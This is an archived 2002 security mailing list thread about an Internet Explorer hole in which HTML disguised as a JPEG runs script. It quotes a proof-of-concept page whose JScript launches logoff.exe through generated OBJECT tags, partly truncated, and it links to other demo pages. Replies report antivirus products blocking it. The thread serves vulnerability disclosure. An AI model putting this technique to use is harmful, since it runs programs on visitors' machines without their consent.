Vulnerability Development mailing list archives

Re: [Re: Rather large MSIE-hole] another variant (NAV and Finjan block this)


From: "David Barnett" <dbarn064 () earthlink net>
Date: Sat, 16 Mar 2002 08:57:47 -0600

I am running Win 2k sp2 MSIE 5.5 and MSIE 6.0 both current patches. I also
have Norton AV and Finjan  SurfinGuard Pro running, both of which caught the
"exploit" and prompted me for further action. NAV alerted me to the exploit
but let it still run, Finjan out right blocked it from running.

----- Original Message -----
From: "NoCoNFLiC" <nocon () castleblack darkflame net>
To: "Magnus Bodin" <magnus () bodin org>
Cc: <vuln-dev () securityfocus com>
Sent: Friday, March 15, 2002 5:49 PM
Subject: FW: [Re: Rather large MSIE-hole] another variant


[magnus () bodin org] Tue, Mar 12, 2002 at 11:32:20AM +0100 wrote:

The latest MSIE-hole is now spreading.

THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the
Content-Type if it "thinks" it knows better, then the code is executed.
This in combination with the malicious code that is possible to run,
then
an "innocent.jpg" with the following content will log off an XP-user.

--%< cut here-----
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>

<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>

var programName=new Array(
    'c:/windows/system32/logoff.exe',
    'c:/winxp/system32/logoff.exe',
    'c:/winnt/system32/logoff.exe'
);

function Init(){
    var oPopup=window.createPopup();
    var oPopBody=oPopup.document.body;
    var n,html='';
    for(n=0;n<programName.length;n++)
        html+="<OBJECT NAME='X'
CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C
    oPopBody.innerHTML=html;
    oPopup.show(290, 390, 200, 200, document.body);
}

</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>
--%< cut here-----


--
magnus                               MICROS~1 BOB was written in Lisp.
            http://x42.com/


   Just passing this along, as some may not be on the sec-basics list.

-----Original Message-----
From: Sprissler, Noah [mailto:NSPRISSLER () PARTNERS ORG]
Sent: March 12, 2002 10:31
To: security-basics () security-focus com
Subject: RE: scary site

That's interesting.  I have disabled active scripting as most have
suggested
and the http://www.liquidwd.freeserve.co.uk/ link stops bringing up a DOS
prompt.  However, if I goto this link from Greymagic
http://security.greymagic.com/adv/gm001-ie/simplebind.html their
implementation of this works fine no matter what settings I disable.
Win2k
with all patches, IE6 with all patches.

-Noah

-----Original Message-----

--

- nocon

======================================

nocon () darkflame net
http://nocon.darkflame.net

======================================




Current thread: